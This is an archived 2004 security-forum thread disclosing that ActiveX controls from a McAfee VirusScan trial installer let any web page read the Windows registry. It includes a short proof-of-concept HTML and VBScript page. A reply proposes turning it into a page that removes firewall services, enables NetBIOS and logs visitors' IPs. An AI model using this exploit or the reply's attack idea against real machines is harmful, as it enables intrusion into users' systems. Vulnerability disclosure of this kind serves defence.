hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Apr 28 2004, 06:53 PM
QUOTE

After installing the McAfree VirusScan, it appears that it is possible for
any web page to access the Windows regisry with the following HTML:

<html>
<object classid="clsid:4C29D864-C55A-46DD-865C-17A1B7CC1A1A" id="gobjReg"
style="display: none;">
</object>
<h1>McAfee installer test</h1>
<script language="vbscript">
document.write( _
gobjReg.RegQueryValue( "HKCU\Control Panel\Desktop", "Wallpaper") _
)
</script>
</html>

(when viewed in IE 6 with default secutiry and with VirusScan installed,
this HTML displays the location of the current Windows desktop bitmap)

You can see this behaviour by selecting the 15-Day Free trial of McAfee
Virus scan from this page:
http://download.mcafee.com/us/eval/evaluate2.asp?cid=9445
Then going through the account creation process and then clicking on the
download link.

The download page (the one with the "Start" button) appears to install a
number of ActiveX controls which are not secured in any way. As well as the
registry one, there are controls for acessing the file system and for
configuring the operating system.

I have uploaded a full copy if the IDL for the installer objects here:
http://www.aslg21.dsl.pipex.com/test/McAfeeIDL.txt
There appear to be lots more fun interfaces that I haven't tested yet.

Jonathan Payne
tibbar
Apr 28 2004, 08:07 PM
nice one...so you could make page to remove firewall services from registry, and enable netbios...and log the ip of course.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.